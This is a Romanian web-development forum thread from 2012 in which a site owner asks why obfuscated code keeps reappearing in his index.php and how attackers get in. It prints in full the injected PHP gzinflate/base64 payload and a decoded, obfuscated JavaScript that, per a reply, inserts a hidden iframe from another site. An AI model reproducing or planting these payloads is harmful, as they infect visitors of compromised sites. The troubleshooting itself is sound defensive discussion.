Site atacat

De zile bune încoace îmi tot apare un cod în pagina index.php. Este vorba despre:

#c3284d#
echo(gzinflate(base64_decode("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")));
#/c3284d#

Din ceea ce am citit eu pe internet problema ar fi legată o breșă de securitate în FileZilla, prin care se pot lua datele de conectare la FTP. Nu sunt sigur că asta ar fi problema, dar pentru orice eventualitate, am schimbat parola de conectare la FTP și am dezinstalat FileZilla.

Codul a continuat să apară în index.php. Cei de la firma de găzduire mi-au zis că site-ul e atacat prin URL și că eu nu verific bine ceea ce i-au din URL prin GET. Așa securizez eu GET:

$pagini = array('despre', 'articole', 'prezentare', 'galeriefoto');
if (isset($_GET['p']) AND ctype_alnum($_GET['p']) AND in_array($_GET['p'], $pagini))
$pagina = $_GET['p'];
else $pagina = 'despre';

E vulnerabilă această metodă? Există vre-o altă metodă mai sigură?

Acum eu nu știu de ce apare acel cod, cum este atacat site-ul, prin ce metodă? FTP, URL, există și altă posibilitate?

Breşa de securitate e în sistemul tău de operare, nu în clientul FTP. Cel mai bine foloseşte şi tu un sistem de operare ca lumea, gen Linux, nu toate bălăriile de sisteme (când vine vorba de securitate).

Metoda ta de apărare e fix pix, deoarece nu adresează vectorul critic de atac. Atacatorul tot va putea să injecteze orice vrea în paginile tale.

Dacă n-ai avea acea gaură în sistemul de operare, metoda de protecţie ar fi bună.

În altă ordine de idei, securitatea ori o ai, ori n-o ai. Nu merge "pe bucăţi".

ala iti apare doar in varianta ce o copiezi in PC? sau si pe index.php de pe server?

ps: isset si in_array sunt suficiente mai sus

Nu cumva folosesti timthumb si nu este actualizat?   80% tind ca cred ca este de la asa ceva, 10% de la tiny editor care permite accesul in zone private (upload fisier si rulat in browser) si 10% "alte eventuale cauze". Multi furnizori folosesc mod_security care impiedica (ingreuneaza) xss/sql inject .

OriginalCopy, on 07 septembrie 2012 - 18:30, said:

Calculatorul pe care îl folosesc nu e al meu, așa că nu pot schimba sistemul de operare, dar pot instala Linux (Ubuntu, îmi place). Aș rezolva problema dacă aș avea două sisteme de operare pe calculator, dar aș folosi doar Linux pentru a mă conecta la server?

Nemesis-, on 07 septembrie 2012 - 18:41, said:

Și pe server, în momentul ăsta site-ul e blocat de Google pe motiv că ar putea fi periculos pentru vizitatori.

CuteGuy, on 07 septembrie 2012 - 18:58, said:

Nu folosesc timthumb, folosesc însă TinyMCE, dar numai pentru zona de administrare

sunt multe cai de access intr-un server
e al tau, sau al unei firme de hosting? folosesti ceva script public cum e WP, joomla etc. ?

Nemesis-, on 07 septembrie 2012 - 19:20, said:

Nu e al meu, e al unei firme de hosting. Am schimbat parola de la FTP în speranța că o să scap de această problemă, dar totul e la fel ca înainte. Nu folosesc WP, joomla sau altceva, site-ul e făcut de mine de la zero. Cei de la firma de hosting mi-au zis că problema e la securitatea site-ului și mi-au dat ca exemplu felul în care verific variabilele GET.

În primul post e felul în care fac verificarea.

Edited by -NeLuTu-, 07 September 2012 - 19:35.

-NeLuTu-, on 07 septembrie 2012 - 19:13, said:

Probabil că nu, nu ştiu.

Nu înţeleg de ce n-ai folosi doar linux pentru treburile serioase, mai toţi oamenii serioşi folosesc mac sau linux, iar pentru PHP linuxul e standardul - majoritatea serverelor cu PHP rulează tot pe linux.

Că doar nu te uiţi la porn şi la youtube când programezi. Ţine windows pt antiviruşi, firewall-uri, muzică, filme, jocuri, şi linux pentru treaba "profesională". La început o să ţi se pară poate mai greu, dar pe termen lung o să vezi că o să devii mai productiv, pentru că linux te expune cunoaşterii, şi vei fi mai capabil să rezolvi mai repede problemele de care te loveşti.

OriginalCopy, on 07 septembrie 2012 - 19:48, said:

Nu sunt foarte sigur că vorbim despre același lucru așa că vreau să precizez faptul că nu eu găzduiesc site-ul. Site-ul e găzduit de o firmă de hosting. Când vorbeam că aș putea folosii Linux ca să mă conectez la server mă refeream la faptul că m-aș putea colecta la serverul firmei de hosting prin FTP, folosind Linux.
Presupun că ei folosesc Linux, nu-mi imaginez un server web pe Windows. (Site-ul nu e al meu, e al unui prieten. I l-am făcut eu. Când am început avea deja cumpărate găzduirea și adresa.)

În ceea ce mă privește pe mine, aveam Ubuntu pe calculator dar s-a stricat, iar acum folosesc calculatorul altcuiva. Trebuie să țin Windows-ul pe el, dar pot instala și Linux.

Edited by -NeLuTu-, 07 September 2012 - 20:18.

-NeLuTu-, on 07 septembrie 2012 - 20:14, said:

Da, nu-l găzduieşti tu, dar tu îi faci deploying, tu îl mentenezi, tu vei avea oricum contact cu linux.

Dacă tot va rula pe linux, de ce să nu-l şi programezi şi să-l testezi tot pe linux?

E vorba de cunoştinţe, d-aia ai impresia că vorbim despre lucruri diferite. Nu vorbim despre lucruri diferite, stai liniştit.

Eu vorbesc despre competenţă, iar la competenţă presupun (sper) că aspiri, din moment ce te afli pe Professional Zone.

Nu stiu de ce insisti pe insecuritatea Windows, cand nu prea are legatura cu problema OP.

Nelutu, daca intradevar problema este la script-ul tau (eu cred ca e putin probabil, daca zici ca e privat), inseamna ca poti observa metoda de acces a haxorului din access logs.
apache tine un fisier access.log unde o sa observi inregistrari de genul:

(IP) - (Data) - (Metoda de access) (interogare) (protocol HTTP/versiune) - (status interogare) - (marime raspuns in bytes)

Ce trebuie sa cauti sunt inregistrari cu alte IP-uri decat al tau, care fac interogari de tip POST. De acolo ar trebui sa-ti dai seama usor care componenta a scriptului iti este exploatata.

Dar eu sunt de parere ca e un atac automat; probabil serverul acelui host e prost securizat si au reusit brute-force la FTP sau ceva de genul asta
in cazul asta n-ai ce sa faci, decat sa schimbi gazda

Edited by Nemesis-, 07 September 2012 - 20:42.

Zilele următoare o să rad hard-ul dacă e nevoie. Voi instala și Linux, pe care o să-l folosesc pentru programare, nu știam că e important să folosesc Linux pentru programare.

OriginalCopy, on 07 septembrie 2012 - 20:19, said:

Am terminat facultatea de Informatică și încerc să devin cât mai bun în programare, programare web, deocamdată.

Nemesis-, on 07 septembrie 2012 - 20:41, said:

Și eu cred că e un atac automat, codul respectiv reapare la câteva ore după ce-l șterg. Și apoi nu s-ar obosii nimeni să atace manual acel site. E site-ul unui club de dans, nu e ceva care să merite osteneala.

Un asemenea atac am avut si eu in urma cu ceva vreme intrat printr-un plugin prost scris si cu gauri de securitate dintr-un wordpress al unui amic ce-si gazduia cateva site-uri pe contul meu. N-am stat sa dau decode la codul injectat la tin ein site, insa cel pe care l-am avut eu era gandit sa se rescrie si, mai ales, era injectat in mai mult de un fisier, ba chiar mi-au fost create niste fisiere php in directoarele in care tineam js-urile si css-urile. Verifica-ti toate fisierele php de pe server. Verifica-ti si directoarele cu fisiere statice. Verifica-ti permisiunile din directoare si nu da drepturi de scriere acolo unde nu e nevoie (directoarele aplicatiei). Daca tot ai ajuns aici verifica-ti si fisierul .htacces daca aveai, sau sterge-l daca nu-l aveai.

egroeg, on 08 septembrie 2012 - 16:08, said:

Exista un site WP pe server, l-am șters și l-am pus pe cel făcut de mine, nu știu după cât timp au apărut problemele așa că nu stiu dacă problema are legătură cu site-ul WP ce era înainte.

L-am decodat eu

<script>try{abre++}catch(a6ba34y){try{gbewgreb+13}catch(asab){e=eval}}if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101,31,69,18,27,19,90,90,46,-1,-5,19,18,17,19,91,87,27,102,86,102,102,17,49,18,33,28,109,-2,-3,18,17,19,18,17,19,18,17,103,90,90,102,32,100,88,87,85,19,47,17,103,87,100,103,45,-2,-3,18,17,19,18,110,19,87,93,102,87,17,110,-1,-5,19,18,17,19,18,17,19,18,101,91,91,100,33,101,86,88,86,17,48,18,101,88,101,101,19,29,17,103,90,90,102,32,62,46,-1,-5,19,18,17,19,111,-2,-3,18,17,19,18,99,88,102,102,101,96,17,27,102,89,92,101,31,102,87,86,87,18,27,19,102,89,92,101,31,98,96,86,66,104,86,101,63,26,46,-1,-5,112,-1,-5,0,-4,87,104,96,84,103,91,96,97,18,67,84,96,85,98,95,63,104,95,83,88,100,56,88,96,86,101,83,101,98,100,25,104,96,90,107,27,108,0,-4,17,19,18,17,105,83,99,19,86,17,48,18,95,88,105,17,55,83,101,88,26,102,97,91,105,29,35,33,35,34,26,46,-1,-5,19,18,17,19,104,82,101,18,100,19,47,17,64,83,101,91,32,84,88,91,93,27,86,31,90,87,101,59,97,102,101,101,25,28,33,36,28,45,-2,-3,18,17,19,18,101,91,91,100,33,101,86,88,86,17,48,18,35,38,38,38,41,41,41,44,34,34,19,29,17,27,86,31,90,87,101,64,97,95,103,90,25,28,18,27,19,34,105,57,56,55,57,56,55,28,18,28,19,26,85,33,89,86,103,54,82,103,87,25,28,18,27,19,34,105,57,56,55,57,27,28,19,26,62,84,102,89,33,100,96,104,96,85,27,101,17,29,18,33,107,56,55,57,27,26,46,-1,-5,19,18,17,19,102,89,92,101,31,52,18,46,19,38,41,37,41,34,46,-1,-5,19,18,17,19,102,89,92,101,31,64,18,46,19,36,34,39,41,37,43,37,39,39,41,44,0,-4,17,19,18,17,103,90,90,102,32,66,19,47,17,103,90,90,102,32,62,19,33,17,103,90,90,102,32,50,46,-1,-5,19,18,17,19,102,89,92,101,31,69,18,46,19,102,89,92,101,31,64,18,22,19,102,89,92,101,31,52,45,-2,-3,18,17,19,18,101,91,91,100,33,97,95,88,65,103,88,100,62,19,47,17,36,32,33,19,33,17,103,90,90,102,32,62,46,-1,-5,19,18,17,19,102,89,92,101,31,97,87,105,103,18,46,19,96,86,107,102,67,84,96,85,98,95,63,104,95,83,88,100,44,0,-4,17,19,18,17,101,87,101,104,100,95,19,102,89,92,101,44,0,-4,110,0,-4,-2,-3,88,102,97,85,101,92,97,95,19,85,99,88,83,101,88,68,82,97,86,96,96,64,102,96,84,86,101,26,99,31,18,62,92,96,29,19,63,82,107,27,108,0,-4,17,19,18,17,101,87,101,104,100,95,19,63,82,103,90,31,101,97,102,97,86,25,27,63,82,107,31,62,92,96,26,19,28,17,101,32,95,88,106,101,27,27,17,30,18,62,92,96,26,46,-1,-5,112,-1,-5,0,-4,87,104,96,84,103,91,96,97,18,88,88,96,86,101,83,101,88,66,100,88,103,85,98,68,82,97,86,96,96,69,101,101,91,95,90,26,102,97,91,105,31,18,93,88,96,88,103,90,29,19,108,96,97,87,26,110,-1,-5,19,18,17,19,104,82,101,18,99,84,96,85,19,47,17,97,87,104,19,68,82,97,86,96,96,64,102,96,84,86,101,57,86,97,87,99,84,102,96,101,26,102,97,91,105,28,45,-2,-3,18,17,19,18,103,84,100,17,95,87,101,103,87,99,102,18,46,19,20,98,96,83,89,90,105,84,103,97,97,89,92,90,95,100,87,99,92,99,89,85,104,90,87,104,91,87,90,109,105,85,106,20,31,102,98,93,92,102,25,26,25,26,46,-1,-5,19,18,17,19,104,82,101,18,100,103,100,17,48,18,24,26,45,-2,-3,-5,87,98,100,25,105,83,99,19,91,17,48,18,33,46,18,90,19,46,17,95,87,95,90,102,89,46,18,90,19,29,28,19,27,108,0,-4,17,19,18,17,19,18,17,19,101,101,101,18,28,48,18,93,88,102,101,88,100,100,78,85,99,88,83,101,88,68,82,97,86,96,96,64,102,96,84,86,101,26,99,84,96,85,31,18,33,31,18,93,88,102,101,88,100,100,33,94,86,97,89,101,91,18,30,19,35,26,80,45,-2,-3,18,17,19,18,110,0,-4,17,19,18,17,101,87,101,104,100,95,19,101,101,101,18,28,19,25,31,26,18,28,19,108,96,97,87,44,0,-4,110,0,-4,-2,-3,101,86,103,59,95,103,87,99,105,83,93,27,88,102,97,85,101,92,97,95,27,27,108,0,-4,17,19,18,17,103,100,106,110,-1,-5,19,18,17,19,18,17,19,18,90,89,26,101,108,98,86,98,88,17,92,88,99,84,95,86,74,83,100,54,100,86,84,102,86,87,18,46,48,18,19,104,96,85,88,88,90,97,87,85,21,27,108,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,103,84,100,17,104,96,90,107,18,46,19,63,82,103,90,31,101,97,102,97,86,25,30,96,86,106,18,53,84,102,86,27,27,32,36,34,33,35,27,44,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,103,84,100,17,87,97,94,84,91,95,65,83,94,88,18,46,19,89,86,97,87,99,84,102,86,67,101,86,104,86,96,69,83,95,87,97,94,70,102,99,92,96,88,27,103,95,92,106,29,19,35,39,31,18,24,92,96,87,98,25,26,46,-1,-5,19,18,17,19,18,17,19,18,17,19,18,17,92,88,99,96,18,46,19,86,96,86,103,94,88,96,101,33,85,99,88,83,101,88,55,93,88,95,86,97,102,25,21,59,55,69,51,62,56,20,26,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,87,101,52,102,101,101,91,83,104,102,86,27,20,100,101,85,19,31,18,19,91,102,101,99,44,32,34,20,28,87,97,94,84,91,95,65,83,94,88,29,19,34,91,95,33,85,88,92,49,34,39,20,26,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,102,106,95,87,31,106,91,85,103,90,17,48,18,19,35,98,105,21,45,17,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,90,89,100,94,33,101,101,108,94,86,33,90,86,92,89,89,103,18,46,19,20,33,99,106,19,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,102,106,95,87,31,105,91,100,92,84,90,95,91,101,108,18,46,19,20,89,92,86,85,88,96,19,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,86,96,86,103,94,88,96,101,33,84,96,87,107,31,84,98,97,88,96,85,54,90,90,95,86,25,92,88,99,96,27,44,0,-4,-6,-4,-5,90,89,100,82,96,87,72,84,101,52,101,87,82,103,87,85,19,47,17,103,100,102,88,45,-2,-3,18,17,19,18,17,19,18,17,112,-1,-5,19,18,17,19,111,84,84,102,84,91,26,86,28,109,90,89,100,82,96,87,72,84,101,52,101,87,82,103,87,85,19,47,17,104,96,85,88,88,90,97,87,85,46,111,-2,-3,111,29,19,35,33,35,27,44];}w=f;s=[];r=String;x="j%";for(i=0;-i+1773!=0;i+=1){j=i;if(e)s=s+r.fromCharCode((1*w[j]+e(x+3)+13));}try{asgasg&13}catch(asga){e("if(1)"+s);}</script>

Nu știu ce înseamnă asta.

E posibil să se rescrie și al meu, pentru că reapare după câteva ore. Ori se rescrie, ori site-ul e atacat la anumite intervale de timp.
Codul e injectat doar în index.php. Nu am o altă filă, includ file dintr-ul director în index.php. Filele pe care le includ sunt curate. În zona de administrare, pe lângă index.php, în care se injectează codul, mai am o pagină de autentificare, care e curată. Cu creearea de file nu am probleme, nu se întâmplă.

Nu mai știu dacă era pe server filă .htaccess, când am pus site-ul. Ieri m-am uitat, era una goală, am șters-o când am sters codul din index.php, azi codul a reapărut în index.php, filă .htaccess nu a apărut. Nu cred că ceea ce se întâmplă are treabă cu .htaccess.

Permisiunile sunt 755, nu le pot face 555, nu știu dacă e normal sau nu.

Toate filele sunt în regulă, indiferent de tip, doar cu index.php am probleme.

Logurile ftp ce zic?

there u go: http://jsfiddle.net/...et/zAfbQ/1/  

(iti insereaza un iframe cu continut de pe alt site)

daca vrei sa afli numele domeniului: http://jsfiddle.net/zAfbQ/2/

dani.user, on 09 septembrie 2012 - 16:00, said:

Nu știu foarte bine ce să caut, dar mi-au atras atenția astea:

157.55.32.77 - - [09/Sep/2012:11:57:21 +0300] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
220.181.108.171 - - [09/Sep/2012:13:07:50 +0300] "GET / HTTP/1.0" 200 62427 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

Totuși, nu știu dacă e ceva în neregulă.

Nemesis-, on 09 septembrie 2012 - 16:12, said:

La capitolul securitate mai am foarte mult de învățat așa că nu prea știu cum să interpretez asta.

Totuși, vre-o idee despre cum aș putea rezolva problema sau știe cineva dacă problema e la site-ul meu sau la server (hosting)?
De vre-o două săptămâni caut o soluție și singurul sfat pe care l-am găsit a fost să schimb parola de la FTP, lucru care nu a funcționat.

Am șters site-ul creat de mine și am pus unul WP, problema nu a dispărut.

Mai e și asta: http://sitecheck.suc...cetosunrise.ro/.

Edited by -NeLuTu-, 09 September 2012 - 17:43.

Hai neluţule, oricât ai încerca să eviţi, la gunoi cu windows...

Eu d-aia nu folosesc, prea multă bătaie de cap. Să nu pot eu să stau liniştit când intru pe site-ul băncii de exemplu... Nu că teoretic n-aş avea grijă de sistem, dar pur şi simplu e o grijă în plus degeaba.

Sau poate îl cureţi acum, dar mereu vei sta cu frica-n ... ce ai.